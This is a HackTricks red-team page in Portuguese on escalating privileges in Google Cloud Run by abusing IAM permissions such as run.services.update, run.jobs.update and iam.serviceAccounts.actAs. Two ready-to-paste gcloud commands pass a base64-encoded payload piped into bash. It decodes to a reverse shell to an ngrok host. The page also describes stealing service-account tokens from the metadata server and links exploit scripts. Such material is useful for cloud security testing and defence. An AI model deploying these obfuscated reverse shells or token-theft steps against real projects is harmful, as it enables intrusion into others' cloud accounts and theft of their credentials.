GCP - Run Privesc

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Cloud Run

Para mais informações sobre o Cloud Run, verifique:

pageGCP - Cloud Run Enum

run.services.create, iam.serviceAccounts.actAs, run.routes.invoke

Um atacante com essas permissões para criar um serviço de execução executando código arbitrário (contêiner Docker arbitrário), anexar uma Conta de Serviço a ele e fazer o código exfiltrar o token da Conta de Serviço dos metadados.

Um script de exploração para este método pode ser encontrado aqui e a imagem Docker pode ser encontrada aqui.

Observe que ao usar gcloud run deploy em vez de apenas criar o serviço é necessário a permissão update. Verifique um exemplo aqui.

run.services.update, iam.serviceAccounts.actAs

Como o anterior, mas atualizando um serviço:

gcloud run deploy hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account="<proj-num>-compute@developer.gserviceaccount.com" \
--region=us-central1 \
--allow-unauthenticated

run.services.setIamPolicy

Conceda a si mesmo permissões anteriores sobre o Cloud Run.

run.jobs.create, run.jobs.run, (run.jobs.get)

Inicie um trabalho com um shell reverso para roubar a conta de serviço indicada no comando. Você pode encontrar um exploit aqui.

run.jobs.update,run.jobs.run,iam.serviceaccounts.actAs,(run.jobs.get)

Semelhante ao anterior, é possível atualizar um trabalho e atualizar o SA, o comando e executá-lo:

gcloud beta run jobs update hacked \
--image=marketplace.gcr.io/google/ubuntu2004 \
--command=bash \
--args="-c,echo c2ggLWkgPiYgL2Rldi90Y3AvNy50Y3AuZXUubmdyb2suaW8vMTQ4NDEgMD4mMQ== | base64 -d | bash" \
--service-account=<proj-num>-compute@developer.gserviceaccount.com \
--region=us-central1 \
--project=security-devbox --execute-now

run.jobs.setIamPolicy

Conceda a si mesmo as permissões anteriores sobre Cloud Jobs.

Referências

Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!

Outras maneiras de apoiar o HackTricks:

Última actualización